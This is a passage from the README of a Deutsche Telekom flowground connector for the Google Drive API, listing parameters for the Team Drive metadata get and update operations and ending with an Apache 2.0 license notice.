* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Gets a Team Drive's metadata by ID.
*Tags:* `teamdrives`
#### Input Parameters
* `teamDriveId` - _required_ - The ID of the Team Drive
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the Team Drive belongs.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
### Updates a Team Drive's metadata
*Tags:* `teamdrives`
#### Input Parameters
* `teamDriveId` - _required_ - The ID of the Team Drive
* `useDomainAdminAccess` - _optional_ - Issue the request as a domain administrator; if set to true, then the requester will be granted access if they are an administrator of the domain to which the Team Drive belongs.
* `key` - _optional_ - API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.
* `oauth_token` - _optional_ - OAuth 2.0 token for the current user.
* `prettyPrint` - _optional_ - Returns response with indentations and line breaks.
* `quotaUser` - _optional_ - An opaque string that represents a user for quota purposes. Must not exceed 40 characters.
* `userIp` - _optional_ - Deprecated. Please use quotaUser instead.
## License
**flow**ground :- Telekom iPaaS / googleapis-com-drive-connector<br/>
Copyright © 2019, [Deutsche Telekom AG](https://www.telekom.de)<br/>
contact: [email protected]
All files of this connector are licensed under the Apache 2.0 License. For details
see the file LICENSE on the toplevel directory.
| 63.441016 | 523 | 0.757295 | eng_Latn | 0.987692 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.